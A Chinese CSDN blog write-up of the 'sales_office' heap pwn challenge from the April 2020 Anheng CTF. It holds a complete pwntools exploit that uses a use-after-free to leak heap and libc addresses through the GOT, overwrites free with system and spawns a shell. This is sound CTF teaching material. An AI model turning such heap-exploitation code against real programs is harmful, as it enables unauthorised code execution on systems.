2020安恒4月赛pwn(看看还能不能更)

最新推荐文章于 2020-07-27 18:51:01 发布
最新推荐文章于 2020-07-27 18:51:01 发布
阅读量737 收藏
点赞数
文章标签: pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/105756087
版权

orz没赶上回家已经5点半了就回顾了一下pwn题
挺好的出的(远程可能为ubuntu18)我这用的是ubuntu16

思路

就是uaf控制好堆块然后写到got表leaklibc然后再次做一次写free为system即可
exp:

#!/usr/bin/python2
from pwn import *
def pwn():
	p=process('./sales_office')
	elf=ELF('./sales_office')
	libc=ELF('./libc.so.6')

	def add(size,data):
		p.sendlineafter(':','1')
		p.sendlineafter(':',str(size))
		p.sendafter(':',data)

	def show(idx):
		p.sendlineafter(':','3')
		p.sendlineafter(':',str(idx))

	def delete(idx):
		p.sendlineafter(':','4')
		p.sendlineafter(':',str(idx))

	add(0x50,'\x02'*2)#0
	add(0x50,'\x01'*1)#1
	add(0x50,'\x03'*3)#2
	delete(0)
	delete(1)
	delete(2)
	add(0x18,'\xb0')
	show(1)
	p.recvuntil(':\n')
	heap_base=u32(p.recv(4))-0x20
	log.success('heap_base: '+hex(heap_base))
	delete(1)
	add(0x50,p64(0x601ffa))
	add(0x50,'dd')
	add(0x50,'dd')
	add(0x50,'a'*0xe)
	show(7)
	libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['free']
	system=libcbase+libc.sym['system']
	delete(1)
	delete(0)
	delete(6)
	add(0x50,p64(0x601ffa))
	add(0x50,'/bin/sh\x00')
	add(0x50,'/bin/sh\x00')
	add(0x50,'a'*0xe+p64(system))
	delete(0)
	log.success('libcbase: '+hex(libcbase))
	p.interactive()

if __name__=="__main__":
	pwn()
doudoudedi
关注
安恒pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
2020安恒月赛-Web-unserialize
qq_41743240的博客
04-25 952
查看源码: <?php show_source("index.php"); function write($data) { return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data) { return str_replace('\0\0\0', chr(0) ...
安恒月赛2020年DASCTF——四月春季赛---Web-Writeup
SopRomeo的博客
04-29 3727
比赛的时候去玩了,刚好兄弟们发了第一个web的源码,于是我自己复现了一下 <?php show_source("index.php"); error_reporting(0); function write($data){ return str_replace(chr(0) . '*' . chr(0), '\0\0\0', $data); } function read($data){...
(uaf/double free)2020安恒杯4月赛sales_office
Jc
05-07 943
索引基本信息IDA分析addshowfree思路exp图exp知识点 基本信息 Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) dynamically 18.04 IDA分析 add s...
2020.4月安恒月赛之杂项
cm_zl
04-25 641
blueshark 发现是取证题,首先寻找特殊字符串,找到一个what_you_want.7z 下面的16进制头是377abc是7z压缩包文件头,将之复制出到winhex。 保存7z压缩包,里面有一个加密文件。提示密码是蓝牙密码。 在wireshark中查找字符串,PIN,发现密码 最后打开文件,得到flag flag{快去试试吧!} ...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
安恒月赛题目参赛源码+项目说明.zip
最新发布
01-23
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 ...安恒月赛题目参赛源码+项目说明.zip
安恒杯”南京邮电大学首届CTF网络攻防比赛实施方案.pdf
09-09
安恒杯”南京邮电大学首届CTF网络攻防比赛实施方案
安恒堡垒机配置说明.zip
03-16
安恒堡垒机配置详解与应用实践》 在网络安全领域,堡垒机作为一种重要的安全设备,承担着运维审计、访问...通过深入了解并实践本文所述内容,用户将能好地利用安恒堡垒机提升运维安全水平,保护企业的核心资产。
安恒4月赛之蓝牙题
weixin_41052824的博客
04-26 1465
今天打了一波CTF比赛,笔者在苦于签到题实在二丈摸不着头脑的时候,笔者的“弟弟”(引号中指某人)突然微信搞一句有一个数据包分析题 这个时候笔者就很高兴,但是没有立马去做这道题,捣鼓了一下签到题之后实在耐人寻味于是乎就去选择搞流量分析题了,一看“弟弟”给我发过来数据包,我就想那肯定得看一下题目呗,不然做个锤子起码题目也体现了方向,于是乎就找了一下原来就是蓝牙题(说是蓝牙题是因为笔者把题目忘了)...
sm 安恒4月赛
re1wn
05-03 1110
sm 安恒4月赛
【4.29安恒杯】writeup
热门推荐
wintersun的地带
04-19 1万+
#### 安恒杯_writeup 以下为比赛中做出的题目MISC: SHOW ME THE FLAGCRYPTO: LAZYATTACK这一题很巧,全部的队伍里面只有我们一个队伍将其做出来。 这一题做出来完完全全是靠运气,在当我做出这一题的时候感觉是懵逼的,完全不知道是怎么回事,flag一下子就出来了而且对了,很兴奋。队友都相互说用了和出题人同一个软件,才得到的答案。结果确实是和出题人用
re学习笔记(42)安恒杯二月月赛-re- easy-py
逆向随笔
02-26 841
安恒杯二月月赛 抗【疫】练习赛 -re- easy-py 新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 题目下载: 链接: https://pan.baidu.com/s/1VAdpObsh0tgw4HLMS-Cfjw 提取码: 2020 pyc文件。将其进行在线反编译 得到python代码 import base64 import string def caser(fla...
安恒杯元旦月赛re第一题
qq_43665031的博客
01-01 486
#安恒杯元旦月赛 逆向第一题 main函数中并没用验证函数,只是一个验证函数,通过寻找,发现fini_array(这里面的函数会在main函数结束后调用)中写入了几个 函数,真正的验证函数就在这 就算寻找到了这个函数,发现unk_4040c0无法解密,调试也没发现什么异常,想到了init_array(在main函数开始前调用),可以看看里面有些什么东西, 发现了四个函数,最重要的只有两个 ...
2020安恒月赛crypto复现
rreally的博客
07-27 477
bullshit 题目: from flag import flag def pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flag def encrypt(message): res = ‘’ for i in range(0,len(message),2): res += str(pairing(message[i]
2020月赛DASCTF
cwr1499640048的博客
07-01 1047
bbcrypto # -*- coding:utf-8 -*- import A,SALT from itertools import * def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return c if __name__ == "__main__": m = 'flag{**
2019安恒一月PWN题目题目
weixin_41293827的博客
02-26 1049
链接:https://pan.baidu.com/s/1bQtCIPGeLvLSgmtJfBTKIg 提取码:30be
DASCTF 2020安恒月赛 4月 pwn1---echo server题解
qy201706的博客
05-08 1065
学到了利用printf泄露libc,以前都只会puts… 0x1 checksec: 0x2 拖进ida: 显然进入sub_4006A7(): 厉害了自定义写入长度,明显的栈溢出 0x88个’a’可覆盖返回地址: 0x3 无system、’/bin/sh’ 泄露libc来做 0x4 printf泄露地址的详解(选择泄露__libc_start_main): 不知道ROP链怎么写,直接去程序里找汇编代码现学!! 发现程序最后的printf(“hello %s”, &s); 到g
实战环境下的网络空间安全人才培养——从‘安恒杯’竞赛看新思路
随着网络空间安全面临的威胁日益复杂,我们需要将这两者好地融合,既注重理论教育,又加强实践操作,培养出既有深厚理论素养,又能应对实际挑战的复合型网络安全人才。 因此,"安恒杯"全国高校网络安全技能竞赛...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值